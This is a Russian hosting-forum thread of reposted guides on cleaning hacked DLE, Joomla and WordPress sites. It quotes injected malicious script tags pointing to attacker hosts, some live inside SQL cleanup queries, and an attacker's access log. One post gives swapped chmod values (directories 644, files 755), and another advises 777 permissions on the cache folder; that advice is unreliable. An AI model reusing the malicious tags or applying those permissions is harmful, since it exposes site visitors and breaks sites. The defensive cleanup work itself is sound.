FAQ   •  Поиск
Вход  •  Регистрация
 
Вирус на сайте

 
Начать новую тему   Ответить на тему    Список форумов newssoft.ru -> Серверные команды
Предыдущая тема :: Следующая тема  
Автор Сообщение
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Вт Янв 06, 2009 11:47 pm    Заголовок сообщения: Вирус на сайте Ответить с цитатой

материал взят с http://forum.ruweb.net/viewthread.php?tid=2007
=====================================
<iframe> или у меня на сайте вирус!

в последнее время участились случаи обращения в службу поддержки по данному вопросу. Пользователь, заходя на свой сайт обнаруживает:
1. изменённый код своей страницы (где чаще всего присутствует код <iframe> )
2. Антивирус ругается на наличие вируса на данной странице
3. не обнаруживает ничего, ничего хорошего для себя (иногда индексный файл нулевой длины, либо некорректно добавлен код в php файл и на экране высвечивается ошибка интрепретатора)

Кратко раскроем механизм того, как это происходит.
На большинство используемых уязвимостей Microsoft (а в большинстве случаев используются уязвимости именно в продуктах этого производителя ПО) уже давно выпустил заплатки
например* ,
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=78107
code:


Exploit.HTML.Iframe.FileDownload

исправление выпущено компанией Microsoft 29 марта 2001 г.


*заплатка на данную уязвимость приведена как пример, полный список уязвимостей и заплаток ищите на сайте http://www.microsoft.com

Но не все пользователи заботятся об установке подобных исправлений.
Получая заражённое таким образом письмо или посещая сайт с таким эксплоитом Вы, сами того не ведая, загружаете на свой компьютер (и запускается он автоматически) другой вирус, чаще всего троян, который ворует Ваши пароли.

например такой
http://www.viruslist.com/ru/viruses/encyclopedia?virusid=147349

пароли на кошельки webmoney, Яндекс-деньги, ftp аккаунты Ваших сайтов и так далее оказываются вруках злоумышленника и в один прекрасный день Вы видите на своём сайте очередной код затрояненой странички (добавляется к вашей станичке пара строчек), а у себя в кошельке видите одни нули. Вычислить интернет-преступников очень тяжело, если сказать точнее, то практически невозможно. И если восстановить сайт достаточно просто из backup, то денег на электронных счетах Вам, практически, больше не увидеть.
http://mastertalk.ru/topic25547.html
http://forum.drweb.com/viewtopic.php?t=4406


продолжение следует....
[update 21 мая 2007]
некоторые вирусы используют запуск скрипта на Вашей странице, например таким способом:
code:
<script>document.write(unescape(


ЧТО ДЕЛАТЬ?
1. прежде всего вычистить свой компьютер от различной "заразы", например, установив антивирус со свежими обновлениями. в критических случаях Вам придётся полностью переустановить систему, так как внедрение вирусов на Ваш компьютер может дойти до такой степени, что лечению это не поддаётся.
2. поставить ВСЕ ЗАПЛАТКИ (сервис-паки) на свою операционную систему, убирающие уязвимости windoцs известные компании microsoft до текущего времени.
3. сменить все свои пароли, в том числе и на почтовые ящики на бесплатных хостингах. пароли, полученные для доступа к нашим услугам, можете по этим инструкциям
http://forum.ruweb.net/viewthread.php?tid=1829
4. кардинальный способ: заблокировать ftp доступ к сайту. пример для тех серверов, где proftpd:
http://www.proftpd.org/localsite/Userguide/linked/x1021.html
создайте, например, файловым менеджером директадмина
http://site-helper.ru/uploading.html#filemanager
файл .ftpaccess
с таким содержанием
quote:

<Limit>
DenyAll
</Limit>

если же есть полная уверенность, что с Вашей сети, например, заражение не произойдёт, а от всех остальных хотелось бы закрыть доступ, то можете разрешить доступ с некоторго диапазона адресов, например так
quote:

<Limit>
Allow 192.168.0.1/32
DenyAll
</Limit>


Как Не Заразиться И Как Правильно Лечиться
* материал взят из поста ЗАРАЗА на локальном форуме sanet.nnov.ru 25.10.2007

Сейчас поколения троянских программ меняются по несколько раз в сутки, причем некоторых - автоматически при выходе обновленных баз к популярным антивирусам. Поэтому наличие антивируса, даже регулярно обновляемого, снижает риск, но совсем не гарантирует безопасности. Желательно, соблюдать элементарные меры гигиены. А именно:

1. Иметь в системе несколько учетных записей. Для работы с Интернет и закачки подозрительного содержимого держать отдельную учетную запись без прав администратора. Мера по надежности лучше любого антивируса.
2. Загружать исполняемый файлы только из известных и проверенных источников. Если качается какая-то новая программа - найти через Google официальный сайт и скачать оттуда. Ни в коем разе не с торрентов, тем более внешних, даже если это свежая игрушка. Если по другому ну совсем никак - закачать, подождать пару дней, проверить свежим антивирусом. Тоже касается кряков к программам.
3. Лучше использовать альтернативный браузер, Mozilla или Opera. Особенно любителям porno, warez, кряков и иже с ним. Ошибок в них не меньше, но ломают их реже.
4. Обновлять антивирус перед каждым выходом в интернет и не реже чем раз в 3 часа при активном браузинге. Лучше чаще.
5. Использовать какие-либо альтернативы антивирусам. Например http://www.gentlesecurity.com/ - достаточно надежный способ защиты.

Если все-таки заразились, то лечиться следующим образом. Антивирусом с самыми последними базами (причем иметь ввиду, что Dr.Web, AVG, NOD32, McAfee работают очень неоперативно, даже если выпускают обновления часто. Kaspersky, Symantec выпускает обновления достаточно шустро. Panda - сносно). Убедиться, что боновление баз прошло успешно. Лучше скачать пару антивирусов, хотя бы триальных версий того же Касперского.

1. Перегрузиться в безопасный режим. Найти/удалить троянцев.
2. Перегрузиться в обычный режим. Подождать немного.
3. Перегрузиться опять в безопасный режим. Если троянцы опять есть - oops. Если не умеем чистить вручную, то форматируем диск.
4. Достаточно свежая утилитка, можно потестировать:
http://www.online-solutions.ru/osam_autorun.php
5. Для очень продвинутых пользователей - AVZ ( http://www.z-oleg.com/secur/avz/ ). Обязательно включать AVZGuard.
6. По окончании лечения проверить c:\windows\system32\drivers\etc\hosts - удалить лишние записи.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Чт Фев 03, 2011 2:34 pm    Заголовок сообщения: DLE Ответить с цитатой

материал взят здесь
http://zloyweb.ru/zacon/758-zheenix-nanosit-udar-po-dle.html

Одним после новогодним вечером января 2011 года получаю от Яндекса шайбу:
Выполнение вредоносного кода может привести к заражению компьютера опасными программами, использованию его без ведома пользователя, а также к порче или краже данных.

В настоящий момент сайт выводится в результатах поиска с пометкой «Этот сайт может угрожать безопасности вашего компьютера».

Пожалуйста, удалите вредоносный код. Если при новой проверке код не обнаружится, пометка в результатах поиска будет снята. Для того чтобы снять пометку как можно быстрее, сразу после удаления кода вы можете запросить перепроверку сайта.


Срочно пишу Платону и получаю ответ:
Здравствуйте!

При посещении Вашего сайта антивирусный робот Яндекса обнаружил вредоносный код следующего содержания:


[script src="h**p://zheenix.msk.ru/abc.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/cc7e42bbbe17b3b9b5f64c72fce24079.js" type="text/javascript"][/script][script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/74a7f439bdeb1b8b2deb077f4865ad34.js" type="text/javascript"][/script][script src="h**p://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js" type="text/javascript"][/script][script src="h**p://goooogle.ipq.co/a848f0bc4a69a36058ff266451532591.js" type="text/javascript"][/script][script src="h**p://googlle.ipq.co/37a80d4c8e82c6dab1b545d003ddb58e.js" type="text/javascript"][/script][script src="h**p://googlle.ce.ms/7b5936ede143efc78b62bf93f6fd0d11.js" type="text/javascript"][/script][script src="h**p://goooglle.org/ea77fb9d4dbe7cec70123da4856bcf61.js" type="text/javascript"][/script][script src="h**p://goooglle.org/34187d6c7a323b7de0498918020aff27.js" type="text/javascript"][/script][script src="h**p://goooglle.org/b621f2c7618b483bc21045a4280f6914.js" type="text/javascript"][/script][script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js" type="text/javascript"][/script]


Звездочки в ссылке вставлены во избежание случайного перехода, скобки в тегах изменены во избежание случайного срабатывания кода.

Подобный ссылки неоднократно встречаются на страницах сайта, при этом имена скриптов могут варьироваться. Пожалуйста, проверьте страницы Вашего сайта и удалите вредоносный код. Вскоре после этого наш робот перепроверит сайт и, если вредоносный код более не будет обнаружен, пометка в выдаче снимется. Перечень зараженных страниц можно узнать в Яндекс.Вебмастере ( http://webmaster.yandex.ru ).

---
С уважением, Платон Щукин
Служба поддержки Яндекса

Срочно лечу на Dle форум и получаю еще одну шайбу от Целсофта за свой скрипт DLE:
"Вирус в базе данных, а не в файлах, а причина несвоевременная установка патчей безопасности"

А теперь будим бороться вместе:
Закрываем дыры в безопасности скрипта:

Проблема: Недостаточная фильтрация входящих данных.

Ошибка в версии: 9.0 и все более ранние версии

Степень опасности: Высокая

Для исправления откройте файлы engine/modules/search.php и engine/modules/fullsearch.php и найдите:
$count_result = 0;

ниже добавьте:
$sql_count = "";

Откройте файл engine/inc/templates.php и найдите:
$allow_save = false;

ниже добавьте:
$_REQUEST['do_template'] = trim( totranslit($_REQUEST['do_template'], false, false) );
$_REQUEST['do_language'] = trim( totranslit($_REQUEST['do_language'], false, false) );


Либо просто скачайте и скопируйте на свой сервер патч для версии 9.0: http://dle-news.ru/files/dle90_path.zip, изменения для более старых версий скрипта, вносятся вручную, как указано выше.


2. Устраняем теперь сам вирус из БД (чистим SQL базу)
как видим из кода:
Код:
[script src="h**p://zheenix.msk.ru/abc.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/cc7e42bbbe17b3b9b5f64c72fce24079.js" type="text/javascript"][/script][script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://zheenix.msk.ru/74a7f439bdeb1b8b2deb077f4865ad34.js" type="text/javascript"][/script][script src="h**p://you-stupped-lox.ucoz.ru/engine.js" type="text/javascript"][/script][script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js" type="text/javascript"][/script][script src="h**p://goooogle.ipq.co/a848f0bc4a69a36058ff266451532591.js" type="text/javascript"][/script][script src="h**p://googlle.ipq.co/37a80d4c8e82c6dab1b545d003ddb58e.js" type="text/javascript"][/script][script src="h**p://googlle.ce.ms/7b5936ede143efc78b62bf93f6fd0d11.js" type="text/javascript"][/script][script src="h**p://goooglle.org/ea77fb9d4dbe7cec70123da4856bcf61.js" type="text/javascript"][/script][script src="h**p://goooglle.org/34187d6c7a323b7de0498918020aff27.js" type="text/javascript"][/script][script src="h**p://goooglle.org/b621f2c7618b483bc21045a4280f6914.js" type="text/javascript"][/script][script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js" type="text/javascript"][/script]

[quote] у нас в краткой и полной новости на сайтах DLE появляются скрипты.
Это вирус на сайте. Как удалить вирус на сайте ??

<script src="h**p://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script><script src="**p://zheenix.msk.ru/abc.js" type="text/javascript"></script><script src="h**p://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>
script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js


Делим их для удобства на части

1.
<script src="http://zheenix.msk.ru/76403bc14134a2b49668b579a3b33ae6.js" type="text/javascript"></script>


2.
<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>


3.
<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>

4. script src="h**p://www.karbrrbrr.co.cc/4b9bb69a9a3375dc1e137fcd8a28ffb5.js"
5. script src="h**p://goooglle.org/055b848c247f4bbacf43455419253429.js
1 код удалить будет сложнее т.к код после слеша везде разный, поэтому начнем со 2 и 3!

Идем в phpmyadmin, выбираем вкладку SQL, видим окошко и туда вписываем:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.msk.ru/abc.js" type="text/javascript"></script>%'


Нажимаем ОК, после чего пропадет из новостей скрипт №2!

Не закрывая SQL удаляем так же скрипт №3 тоесть выполняем Такой sql запрос:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://ivan81.ucoz.ru/engine.js" type="text/javascript"></script>%'


Нажимаем ОК!

Скрипт №3 так же удален!

Теперь возьмемся за скрипт №1

В phpmyadmin выбираем вкладку "Экспорт" и нажимаем ОК, сохраняем на компьютер!
Открываем эту базу с помощью Microsoft Word, нажимаем "правка"---"найти" ---"заменить" и вписываем в поле найти: (zheenix)*(js) а в поле замена вписываем zheenix.ru , тут же нажимаем "больше" и ставим галочку на "Подстановочные знаки" , нажимаем "заменить все"!
Этим мы избавились от разного кода! Сохраняем изменения!
Идем в phpmyadmin ---> структура ----> и отмечаем все галочки ---> далее удаляем все!
Теперь идем во вкладку "импорт" , нажимаем обзор и выбираем нашу измененную БД, ставим вместо utf8 ---> cp1251 и нажиимаем ОК! База загружена!

Теперь снова идем во вкладку SQL и выполняем такой запрос:

Код:

UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://zheenix.ru" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://zheenix.ru" type="text/javascript"></script>%'



Нажимаем ОК!
Вот собственно и все!
ах да еще последних 2 запроса 4 и 5
Код:
UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://www.karbrrbrr.co.cc" type="text/javascript"></script>%'




UPDATE dle_post
SET
short_story=REPLACE(short_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', ''),
`full_story`=REPLACE(full_story, '<script src="http://goooogle.ipq.co" type="text/javascript"></script>', '')
WHERE
`short_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'
OR
`full_story` LIKE '%<script src="http://goooogle.ipq.co" type="text/javascript"></script>%'



Примечание: Открываем скачанную базу SQL базу с помощью Microsoft Word, нажимаем "правка"---"найти" ---"заменить" и вписываем в поле найти: (zheenix)*(js) а в поле замена вписываем zheenix.ru , тут же нажимаем "больше" и ставим галочку на "Подстановочные знаки" , нажимаем "заменить все"!

Да я бы все-таки поменял пароли к админке, фтп, SQL, изменил подход к безопасности сайтов DLE -ставил бы обновление защиты регулярно!!!
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Вс Фев 13, 2011 2:21 pm    Заголовок сообщения: Ответить с цитатой

http://zloyweb.ru/zacon/758-zheenix-nanosit-udar-po-dle.html

http://www.bormotuhi.net/showthread.php?t=11279
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Вт Апр 12, 2011 11:38 am    Заголовок сообщения: Ответить с цитатой

Ботнет Bredolab
http://www.securelist.com/ru/analysis/208050672/Botnet_Bredolab_Konets_istorii
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Сб Авг 20, 2011 8:35 pm    Заголовок сообщения: Ответить с цитатой

Через какую дыру взломали сайт?
http://habrahabr.ru/company/sprinthost/blog/125839/#habracut
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Ср Авг 31, 2011 10:36 am    Заголовок сообщения: Ответить с цитатой

http://blakeembrey.com/2011/08/25/warning-somethings-not-right-here/
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Чт Сен 29, 2011 11:42 am    Заголовок сообщения: Ответить с цитатой

http://www.securelist.com/ru/analysis/208050672/Botnet_Bredolab_Konets_istorii

Для того чтобы обезопасить себя от подобного типа угроз, необходимо придерживаться следующих рекомендаций по защите пользовательских компьютеров и веб-сайтов.

Защита пользовательских компьютеров
Необходимо своевременно устанавливать обновления и для операционной системы, и для программ сторонних разработчиков, так как большинство эксплойтов и червей используют уязвимости в ПО, которые уже закрыты в обновленных версиях соответствующих продуктов. bРазумеется, надо установить антивирусное ПО и поддерживать антивирусные базы в актуальном состоянии. Антивирус хоть и не панацея, но способен значительно снизить риск заражения компьютера.
Ну и конечно, не стоит проходить по ссылкам в спамовых письмах, в сообщениях от незнакомых людей в социальных сетях и программах мгновенного обмена сообщениями. Это, как говорится, без комментариев.

Защита сайтов
Для заражения веб-сайта могут быть использованы уязвимости в коде сайта. Для того чтобы свести к минимуму возможность использования злоумышленниками уязвимостей, необходимо следить за выпуском обновлений ПО и своевременно обновлять программное обеспечение сайта.
Следует помнить о существовании сервисов и систем сканирования сайтов для обнаружения вредоносного кода, а также несанкционированного изменения контента.
В целях безопасности лучше отключить автоматическое сохранение ftp-паролей в ftp-клиентах (напомним, что многие программы, ворующие пароли от ftp-аккаунтов, в частности используемый Bredolab Trojan-PSW.Win32.Agent.qgg, ищут на зараженном компьютере именно сохраненные пароли).
Может оказаться полезным периодически делать резервные копии сайта (баз данных, файлов, в которых могут храниться важные данные) на случай, если в результате заражения данные окажутся испорченными.
Если сайт все-таки оказался заражен, простого удаления вредоносного кода с сайта может быть недостаточно. Например, если были похищены пароли для ftp, то через некоторое время сайт может быть снова заражен. Для устранения проблемы нужно выполнить следующие шаги:
Проверить наличие обновлений для ПО, установленного на сайте, и загрузить их (чтобы исключить заражение сайта через уязвимости).
Используя антивирусный продукт с самыми свежими антивирусными базами, провести полное сканирование пользовательских компьютеров, с которых есть доступ к ftp сайта.
Сменить пароли к ftp-аккаунту.
Очистить сайт от вредоносного кода.

Следуя приведенным выше рекомендациям, можно значительно снизить риск того, что ваши компьютерные ресурсы окажутся частью какого-нибудь ботнета. Не забывайте, что заражение проще предупредить, чем вылечить.
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Пт Апр 13, 2012 5:58 pm    Заголовок сообщения: Ответить с цитатой

Код:
http://joofaq.ru/problemi-s-joomla-i-rasshireniyami/bezopasnost-sayta/zaschita-ot-vzloma-sayta-na-joomla-osnovnie-metodi-vzloma

Защита от взлома сайта на Joomla. Основные методы взлома
материал взят с
[url]http://joofaq.ru/problemi-s-joomla-i-rasshireniyami/bezopasnost-sayta/
zaschita-ot-vzloma-sayta-na-joomla-osnovnie-metodi-vzloma[/url]


Основные методы взлома сайта на Joomla и его последствия
Вирус - один из самых опасных. При попадании на Ваш компьютер, вирус сканирует его на наличие FTP менеджера ити TotalCommandera. В этих программах хранятся Ваши пароли и адреса серверов, которые скрипт отправит злоумышленнику. Этого будет достаточно, чтобы потерять сайт. Самым опасным этот метод считается потому, что Вы рискуете остаться без всех своих сайтов сразу! Последствие попадания вируса - в код сайта вставляется iframe с вредоносным кодом, различные JS скрипты или ссылки на другие сайты и т.д.. После этого на Ваш сайт начнут ругаться все антивирусы и поисковые системы.
SQL инъекция - довольно распространённый способ взлома. Основан на получении доступа к файлам базы данных. А если точнее, то к логину и паролю администратора. Таким образом злоумышленник может не только увидеть Ваш логи и пароль или другие данные, но и изменить их под свои нужды. Последствие SQL инъекции - взлом пароля Joomla к административной панели сайта. Так же злоумышленник может вообще удалить всю информацию Вашего сайта.
Восстановление пароля администратора - в последнее время сайты на Joomla всё чаще пытаются взломать именно этим способом. Даже если у Вас на сайте стоит компонент генерации ЧПУ, можно всё равно прописать в адресной строке такой код: ВАШ_САЙТ/index.php?option=com_user&view=reset и Вам откроется окошко для восстановления пароля. Хакеры вводят туда специальный код и изменяют Ваш пароль. Последствия потери пароля администратора - думаю, тут и так всё понятно. Полный доступ злоумышленника в административную панель Вашего сайта. Только представьте, что может сделать , к примеру, Ваш конкурент?
Через "дырявые" расширения - взлом сайта через дырки в различных компонентах, используя ввод методом POST на определённые страницы. Последствия взлома через дырки в расширениях - в папке с компонентом, который взломали, будет лежать много "левых" файлов. Такие сайты скорее всего заблокирует хостер. И поисковые системы тоже будут ругаться на то, что на сайте вирус.
PHP инъекция - внедрение вредоносного кода через Вашего сервера.
XSS или межсайтовый скриптинг - возникает во время генерации сервером страниц, в которых содержится "вражеский" скрипт. Эта атака так же может произойти из-за Вашего сервера. Например, если с Вами на сервере находится зараженный объект или сайт, то Вы так же подвержены опасности.
Защита и профилактика сайта Joomla от взлома


Установите хорошее антивирусное программное обеспечение. Но кроме этого нужно ещё регулярно проводить обновления базы вирусов.


Не скачивайте расширения с непроверенных источников и старайтесь не использовать варезные (краденные или взломанные). Я, например, однажды скачал какой-то шаблон для тестирования и обнаружил на нём чужие ссылки на разные сайты. Этого урока мне хватило, чтобы больше не лазить по таким говно-порталам, а качать всё с официальных источников. Но если уж Вы скачали что-то с варезного сайта, то перед установкой сначала проверьте антивирусом на наличие сюрпризов, просмотрите файлы расширения на наличие "чужих" ссылок. Не рекомендую непроверенные расширения ставить на рабочий сайт, сначала лучше проверить на каком-нибудь демо-сайте на локальном хостинге. А потом, убедившись что всё в порядке, ставьте на рабочий.


Обязательно делайте резервные копии сайта и базы данных. Для этого можно использовать компонент резервного копирования JoomlaPack. Это поможет Вам защититься не только от хакеров, но и от своих собственных ошибок. Я делаю резервные копии после каждого изменения на блоге (написал статью - сохранился!). Только не забывайте скачать файл бэкапа на компьютер, а то хакеры могут его просто удалить с сервера.


Для того, чтобы спрятать свой сайт от глаз хакеров, нужно использовать SEF компоненты для генерации человеконятных ссылок. Можно пользоваться стандартным SEF или, к примеру, ARTIO JoomSEF. Дело в том, что Joomla по своему генерирует ссылки, и они выглядят вот так: http://localhost/sayt/index.php?option=com_content&view=category&layout=blog&id=4&Itemid=3. И хакер может просто вбить в поиске "com_content" (если в нём есть "дырки") или другое уязвимое расширение и ему откроется список сайтов, в котором можете быть и Вы.


Кроме этого лучше вообще скрыть, какой CMS Вы пользуетесь. Тогда риск попадания Вашего сайта в поле зрения хакера резко снижается. Для этого необходимо удалить из кода Вашего сайта строчку:
 <meta name="generator" content="Joomla! 1.5 - Open Source Content Management" />

Заходите на свой сайт (Как подключиться к сайту через FTP клиент FileZilla?) и идёте по этому пути ВАШ_САЙТ/libraries/joomla/document/html/renderer/. В этой папке находите файл head.php и открываете его, например, блокнотом. С помощью поиска ищете эту строку:

$strHtml .= $tab.'<meta name="generator" content="'.$document->getGenerator().'" />'.$lnEnd;

Удалите её и скопируйте файл обратно на сайт. Теперь у Вас уже стало на одну лишнюю строку кода меньше.


Установите плагин plgSystemJSecure. Используя этот плагин, злоумышленник не сможет даже увидеть вашу административную панель, введя просто ВАШ_САЙТ/administrator. Так как в этом плагине нужно будет ввести кодовое слово. После того, как Вы его введёте, ссылка на админ-панель Вашего сайта будет выглядеть так: ВАШ_САЙТ/administrator/?ваше_кодовое_слово. Это достаточно хорошая защита админки Joomla.


Ищите всегда только самые новые версии используемых Вами расширений. Или обновляйте те, которые уже стоят. Разработчики часто выпускают обновления своих продуктов, ибо хакеры вечно находят в них какие-нибудь изъяны.


Все неиспользуемые компоненты, модули, плагины, шаблоны и прочее лучше удалять полностью! Даже базу данных желательно почистить. Например, на каком-то компоненте хакеры нашли уязвимость. Если у Вас стоит именно этот компонент, а Вы им даже не пользуетесь и, естественно, не обновляли его (пусть он даже и выключен), то это всё равно не спасёт Вас от атаки. Так что лучше удалять всё подчистую. Оставляйте только самое необходимое и не ставьте все подряд для различных тестов на рабочий сайт.


Для того, чтобы хакеры не знали, какая версия уязвимого компонента установлена (версии постоянно обновляются и избавляются от "дырок"), нужно удалить номера версий всех сторонних расширений. Для этого скачайте себе на компьютер все сторонние компоненты, модули, плагины и шаблоны с помощью FTP менеджера FileZilla или другого клиента и с помощью любого текстового редактора удалите в этих файлах любые упоминания о версиях расширений.


Если Вы не используете на своем сайте модуль регистрации пользователей (у меня его тоже нету, кстати), то лучше удалить файлы, которые отвечают за восстановление пароля и его сброс. Можно удалить или всю папку com_user (которая находится по пути ВАШ_САЙТ/components) или отдельный файл, отвечающий за сброс - reset.php. Этот файл находится по пути ВАШ_САЙТ/components/com_user/models.


Для борьбы с SQL инъекциями есть два основный способа. Первый - это установка компонента jFireWall (хороший и довольно мощный компонент, есть бесплатная версия jFireWall Lite). Второй - это смена префикса к таблицам в базе данных. Второй способ я опишу поподробнее, так как изменение этого префикса может защитить Вас практически от всех SQL инъекций. Сначала рекомендую Вам отключить сайт в общих настройках joomla, так как он всё равно выйдет из строя на некоторое время и обязательно сделать резервную копию сайта и базы данных. А теперь поехали по порядку:

- заходите в админа панель своего сайта, переходите в общие настройки/сервер. В правой части экрана ищите "Префикс базы данных", там будет написано faqj_. Заменяете его на любую надпись, например, на asd_ и сохраняете;

- заходите в PhpMyAdmin и делаете экспорт своей базы данных на компьютер и сохраняете её. Для сохранения базы выберете её и в правой части экрана вверху ищите "Экспорт". Выделяете все части базы, внизу ставьте SQL и ещё чуть ниже "Сохранить как файл". Справа внизу нажимаете на кнопочку "Ok". Сделайте ещё одну копию на всякий случай и сохраните куда нибудь в другое место;

- после того, как Вы убедились в том, что база данных успешно сохранена, можно приступить к удалению базы из PhpMyAdmin. Для этого выберете Вашу базу, промотайте мышь в низ экрана и найдите там "Отметить все". Отмечаете и чуть правее ищите "С отмеченными" и выбирайте удалить;

- теперь открывайте сохранённый файл с базой данных, к примеру, блокнотом. Нажимайте Ctrl+H и видите такое окошко:



с помощью этой функции можно одним махом изменить все префиксы в Вашей таблице, нажав на "Заменить все";

- на а теперь заходите опять в PhpMyAdmin и нажимайте справа вверху "Импорт" и выбирайте Ваш файл с новыми данными. Кодировку поставьте UTF-8.


Необходимо правильно выставить права на файлы и папки. Сделать это можно с помощью FileZilla. Вообще для каждого сервера нужны свои определённые настройки, которые лучше узнать у своего хостера. Но обычно права ставят такие: на файлы, которые находятся в корневой директории 444, на папки в корневой директории ставят 755, на папки tmp и logs ставят 705, на паку своего шаблона поставьте 555, на папку image/stories можно поставить 755, на папку Cache 777.

В принципе, я думаю этих мер безопасности должно хватить для хорошей защиты сайта на Joomla. Если я смогу узнать ещё какие-нибудь интересные способы, то буду их добавлять в соответствующий раздел на сайте по улучшению безопасности на сайте Joomla. Желаю Вам никогда не попадаться на хакеров, а тем более на профессионалов. Если не хотите пропустить интересные статьи блога Joofaq.ru, то подпишитесь на получение новостей любым удобным способом.


Последний раз редактировалось: admin (Пн Окт 08, 2012 9:46 am), всего редактировалось 1 раз
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Вт Июн 19, 2012 7:32 pm    Заголовок сообщения: Ответить с цитатой

переадресация с поисковых систем
Лечение тут http://virusdie.ru/index.php
После чего
find ~user/public_html/ -type d|xargs chmod 644
find ~user/public_html/ -type f |xargs chmod 755
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Ср Июл 18, 2012 12:31 am    Заголовок сообщения: Ответить с цитатой

защита wp
10+ способов защитить блог
http://cospi.ru/10-sposobov-zashhitit-blog/
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Чт Ноя 15, 2012 11:16 am    Заголовок сообщения: WP Ответить с цитатой

http://blogproblog.com/uyazvimost-v-timthumb-php/
http://wordpress.org/extend/plugins/timthumb-vulnerability-scanner/
Вернуться к началу
Посмотреть профиль Отправить личное сообщение Отправить e-mail
admin
Site Admin


Зарегистрирован: 11.09.2008
Сообщения: 390

СообщениеДобавлено: Пт Dec 14, 2012 12:10 am    Заголовок сообщения: Ответить с цитатой

http://www.vvbox.ru/domains/kak-vordpress-lomayut-i-kak-ot-ehtogo-spastis

Код:
9.12.2012 01:42

В этой статье я расскажу о том, как ломают WordPress, рассылают спам и делают неприятно владельцу сайта. В статье использован реальный лог, но из него удалены данные, позволяющие опознать сайт, ip-адреса хакера, напротив, оставлены натуральными.

Итак. У некоторого владельца сайта случилась неприятность — с сайта скриптами был разослан спам и хостинг-провайдер по этому случаю принял меры. И что самое обидное — не сам владелец сайта рассылал спам, а без него постарались.  И вот как это случилось:

Для начала узнали имя администратора, оно оказалось не admin:

87.244.148.82 — - [25/Nov/2012:01:55:09 +0400] «GET /?author=1 HTTP/1.0″ 301 0 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4″
 87.244.148.82 — - [25/Nov/2012:01:55:10 +0400] «GET /author/boss/ HTTP/1.0″ 200 46705 «-» «Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.4 (KHTML, like Gecko) Chrome/22.0.1229.94 Safari/537.4″

Дальше начали подбирать пароль:

